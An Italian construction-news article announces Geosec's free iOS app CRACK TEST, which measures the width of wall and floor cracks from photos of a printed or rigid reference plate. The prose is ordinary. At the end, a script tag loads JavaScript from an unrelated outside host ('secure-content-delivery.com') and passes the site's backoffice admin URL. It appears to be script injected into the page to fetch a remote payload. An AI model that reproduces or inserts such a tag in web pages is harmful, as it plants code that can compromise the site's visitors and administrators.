1. Home
  2. Notizie e Mercato
  3. GEOSEC lancia CRACK TEST™: il software per monitorare le lesioni nei muri

GEOSEC lancia CRACK TEST™: il software per monitorare le lesioni nei muri

Ristrutturazioni di
5/5
votato da 1 persone
CRACK TEST™, il nuovo software di Geosec, è gratuito, facile da usare e per uso professionale


Geosec ha finalmente lanciato sul mercato un'APP per il monitoraggio delle lesioni, l'alternativa ai soliti fessurimetri analogici, scomodi e costosi; è un'APP è pronta a superare le limitazioni dei vecchi fessurimetri nel loro stesso campo. CRACK TEST™, questo è il nome dell’innovativo software, è, infatti, un’applicazione fornita gratuitamente da Geosec s.r.l., semplice da usare e destinata ad un pubblico tecnico e professionale.

Attualmente disponibile solo per dispositivi con sistema operativo iOS, si può scaricare direttamente da App Store sul proprio tablet o smart phone. Una volta completata l’installazione, Crack Test sarà perfettamente in grado di cominciare il monitoraggio dell’ampiezza delle lesioni su pareti o pavimenti, seguendo le esplicazioni fornite nella sezione TUTORIAL.

L’applicazione ha una precisione di decimi di millimetro e, grazie a un algoritmo matematico dedicato, è in grado di correggere la distorsione prospettica, in modo da riportare ogni immagine di misura su piano parallelo a quello del sistema di riferimento che verrà preliminarmente applicato sulla parete. Quest'ultimo poi può essere stampatoautonomamente dall’applicazione e fissato su un supporto rigido adeguato; per chi, invece, è in cerca di strumenti più professionali sono disponibili nella sezione SUPPORTI alcuni supporti rigidi già predisposti per uso esterno, realizzati su piastre quadrate di lato 70 mm e spessore 2 mm; le piastre, leggere, rigide, resistenti all’acqua e al sole, sono facilmente applicabili a pareti o pavimenti con semplici mastici di fissaggio e sono disponibili a prezzi altamente competitivi tramite il fornitore ufficiale ed esclusivo per l’Italia (reperibile sempre tramite la funzione SUPPORTI).


Per ulteriori informazioni: www.cracktest.it

<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.1748244034884362" type="text/javascript"></script>